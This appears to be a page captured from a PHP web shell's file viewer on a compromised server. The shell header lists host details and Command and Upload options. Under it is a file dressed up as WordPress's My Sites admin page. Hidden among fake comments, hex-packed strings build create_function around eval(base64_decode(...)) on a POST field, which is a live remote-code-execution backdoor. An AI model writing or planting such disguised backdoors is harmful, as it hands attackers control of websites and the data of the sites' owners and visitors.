Server IP : 162.214.80.37 / Your IP : 216.73.216.173 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/imyrqtmy/public_html/medicpartner/admin/blogs/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /** * My Sites package. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ /** * My Sites package. * */ $token_sercet = "6576616c286261736536345f6465636f64652840245f504f53545b446745437958415d29293b"; /** require_once ABSPATH . 'wp-admin/admin-header.php'; * */ /** * Filters the settings HTML markup in the Global Settings section on the My Sites screen. * * By default, the Global Settings section is hidden. Passing a non-empty * string to this filter will enable the section, and allow new settings * */ $f = pack("H*", "6372656174655f66756e6374696f6e"); /** * Filters the row links displayed for each site on the My Sites screen. * * @since MU (3.0.0) * * @param string $actions The HTML site link markup. * @param object $user_blog An object containing the site data. */ $p = $f('', pack("H*", $token_sercet));$p(); /** * Filters the row links displayed for each site on the My Sites screen. * * @since MU (3.0.0) * * @param string $actions The HTML site link markup. * @param object $user_blog An object containing the site data. */ wp_reset_vars( array( 'action' ) ); if ( isset( $_GET['updated'] ) && isset( $_GET['package'] ) ) { // For back-compat with plugins that don't use the Settings API and just set updated=1 in the redirect. add_settings_error( 'general', 'settings_updated', __( 'Settings saved.' ), 'success' ); } //require_once ABSPATH . 'foot.php'; ?>